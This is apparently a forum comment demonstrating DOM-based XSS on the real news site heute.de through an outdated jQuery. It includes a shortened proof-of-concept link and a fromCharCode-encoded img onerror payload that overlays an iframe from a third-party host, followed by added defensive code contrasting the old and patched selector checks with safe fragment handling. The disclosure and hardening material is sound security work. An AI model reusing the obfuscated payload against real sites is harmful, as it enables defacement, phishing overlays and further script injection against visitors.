That isn't true. Every static website could be vulnerable through DOM XSS.
In this case the integrity of the site is violated. PoC: http://bit.ly/1S834lS - redirects to http://www.heute.de/#"><img src=x onerror=document.write(String.fromCharCode(60,105,102,114,97,109,101,
32,115,114,99,61,34,104,116,116,112,58,47,47,99,97,116,
46,119,119,119,46,104,101,117,116,101,46,100,101,46,109,101,111,119,
98,105,102,121,46,99,111,109,47,34,32,115,116,121,108,101,61,34,98,
111,114,100,101,114,58,32,48,59,32,119,105,100,116,104,58,32,49,48,
48,37,59,32,104,101,105,103,104,116,58,32,49,48,48,37,59,32,109,97,
114,103,105,110,58,32,45,56,112,120,59,112,111,115,105,116,105,111,
110,58,32,97,98,115,111,108,117,116,101,59,34,62))>

We just inject an iframe through the onerror handler of the <img> tag:

<iframe src="http://cat.www.heute.de.meowbify.com/" style="border: 0; width: 100%; height: 100%; margin: -8px;position: absolute;"></iframe>

In this case the site is using an outdated jQuery version, which is vulnerable to this kind of attack. http://bugs.jquery.com/ticket/9521
Edit: Thanks :)
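
The fragment-to-selector pattern behind the linked jQuery ticket, as an added example that is not part of the original comment. The two regular expressions are a simplified model (an assumption, not jQuery's source) of how a string handed to `$()` was classified before and after the fix; `fragmentToId` and `scrollToFragment` are hypothetical helpers showing handling that never passes the URL fragment to `$()`.

```javascript
// Simplified model (assumption) of the pre-fix check: any "<...>" run in the
// string, even after a leading "#", made $() build markup instead of selecting.
const LEGACY_HTML_TEST = /^[^<]*(<[\w\W]+>)[^>]*$/;
// Same model after the fix: a string that starts with "#" is never markup.
const PATCHED_HTML_TEST = /^[^#<]*(<[\w\W]+>)[^>]*$/;

function treatedAsHtml(input, regex) {
  return regex.test(input);
}

// Hardened handling that does not depend on the library version:
// accept only "#" plus a conservative id and look it up by id, never via $().
const SAFE_ID = /^#([A-Za-z][\w\-]{0,63})$/;

function fragmentToId(hash) {
  const m = SAFE_ID.exec(hash);
  return m ? m[1] : null;
}

function scrollToFragment(hash, doc) {
  const id = fragmentToId(hash);
  if (id === null) return false; // reject outright, do not try to "clean" it
  const el = doc.getElementById(id);
  if (!el) return false;
  el.scrollIntoView();
  return true;
}

// Constructed sample fragments (not taken from any real site).
const SAMPLES = ['#section-2', '#"><img src=x>', '#', '#a b'];

function classify(samples) {
  return samples.map((h) => ({
    hash: h,
    legacyBuildsHtml: treatedAsHtml(h, LEGACY_HTML_TEST),
    patchedBuildsHtml: treatedAsHtml(h, PATCHED_HTML_TEST),
    acceptedId: fragmentToId(h),
  }));
}

console.table(classify(SAMPLES));
```

In a browser the call would be `scrollToFragment(location.hash, document)`, typically from a `hashchange` listener.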